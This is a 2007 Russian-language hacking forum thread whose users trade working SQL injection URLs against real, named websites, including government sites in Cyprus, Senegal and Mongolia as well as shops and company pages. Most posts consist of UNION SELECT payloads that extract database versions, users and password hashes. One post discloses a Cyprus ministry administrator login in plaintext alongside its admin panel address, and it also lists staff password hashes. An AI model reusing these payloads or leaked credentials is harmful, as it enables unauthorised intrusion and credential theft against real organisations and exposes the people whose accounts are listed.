13.08.2007, 11:29
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
Сообщение от Calcutta
http://top.kmvcity.ru/stat.php?id=1' < - ругается на SQL синтакс
при подборе через +order+by ничего нельзя добиться.
что можно получить с этого сайта "толкового"?
Подобрал кол-во столбцов:
Код:
http://top.kmvcity.ru/stat.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
Попробуй угадать таблицы 
|
|
|
17.08.2007, 23:20
|
|
Banned
Регистрация: 15.07.2007
Сообщений: 39
С нами:
9907135
Репутация:
43
|
|
Код:
http://www.iltod.gov.mn/forum.php?cat=-1+union+select+1,2,USER(),4,5/*
Код:
http://www.sante.gouv.sn/actualites.php?id=1+union+select+1,2,3,4/*
Код:
http://www.muat.gouv.sn/projets.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,19/*
Код:
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,USER(),4,5,6/*
|
|
|
|
20.08.2007, 23:03
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
Кроме version(),user, password дальше не могу ничего подобрать
код:
http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
|
|
|
|
20.08.2007, 23:23
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
Сообщение от fobofob
Кроме version(),user, password дальше не могу ничего подобрать
код:
http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
мона еще хеш админа вытащить...
Код:
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*
|
|
|
|
25.08.2007, 00:55
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами:
9982591
Репутация:
29
|
|
Сообщение от Hormold
http://www.softp.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+members/*
Несмог подобрать...
ыгы ыгы...Тыбы статьи почитал а?
http://www.softp.ru/?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17/*
Во первых - с чего ты взял что полей 10 во вторых с чего ты взял что там есть таблица мемберс?Или тебя плющит потому что ночь?Ты может выпил?
СТАТЬИ ЧИТАААААТЬ  (юзай поиск и найдешь их на а-чате)
там еще бд мускул 4 - так что геморой с таблицами оставил тебе....
|
|
|
|
22.09.2007, 21:11
|
|
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
С нами:
10149547
Репутация:
452
|
|
Код:
http://www.reporterdiario.com.br/index.php=3fid=3d-33150'+union+select+1,user(),database(),version(),5,6,7,8,9,10,11/*
|
|
|
|
23.10.2007, 20:21
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от v1ru$
Код:
http://www.av d.org.ua/viewdetails.php?id=-2019+UNION+SELECT+1,2,3,4,conc at(user(),0x3a,database(),0x3a,version()),6,7,8,9,10,11,12,13,14,15/*
Есть таблица user и поле username Вот это совпало =) минуту назад хекал этоже
Код:
http://studyport.info/viewdetails.php?id=-1+union+select+1,concat(username,0x3a,passwd,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+101,1/*
подобрал методом тыка 
|
|
|
|
Cyprus Ministry Of Interior |
26.10.2007, 13:14
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Cyprus Ministry Of Interior
Код:
http://moi.gov.cy/newscontent.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11/*
moi@localhost:4.1.22-standard:moi
Код:
http://moi.gov.cy/newscontent.php?id=-1+union+select+1,2,3,username,5,password,7,8,9,10,11+from+users/*
adminmoi:entermoi http://moi.gov.cy/administration/index.php
Сегодня захожу, а там уже другая cms =( Но и в ней есть скуль =)
Код:
http://moi.gov.cy/index.php?ac=39&l=-1'+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7/*
moinew@localhost:4.1.22-standard:moinew
Код:
http://moi.gov.cy/index.php?ac=39&l=-1'+union+select+concat(username,0x3a,password),2,3,4,5,6,7+from+users/*
adelin:f5bb7d76f46bc2d130aa8cc3e6fa5c38
neos:fbade9e36a3f36d3d676c1b808451dd7: z
costas:dc3a463af4afe7d32bedfac972a1b1a6 |
|
|
|
09.11.2007, 22:39
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от Holokost
http://www.spmi.ru/index.php?id=6&t=show_news&nid='&lang=1
хз че это, но по моему то, что надо.
вот оно же но более раскрученно
Код:
http://www.spmi.ru/index.php?id=6&t=show_news&nid=1' UNION SELECT '1',VERSION(),3 WHERE 1=1--
__________________
Кто я?..
|
|
|
|
02.12.2007, 03:59
|
|
Познающий
Регистрация: 26.07.2007
Сообщений: 50
С нами:
9892256
Репутация:
62
|
|
Сообщение от KEHT33
Компания АСКОН
smf_members (чёт не получилось просматреть юзеров)
Код:
http://www.ascon.ru/?news=361+UNION+SELECT+1,2,3,concat_ws(0x05,ID_MEMBER,ID_GROUP,memberName,passwd,passwordSalt,emailAddress),5,6+FROM+forum.smf_members+limit+1,1/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?441629){kind=avatar}
Комбинированный вид
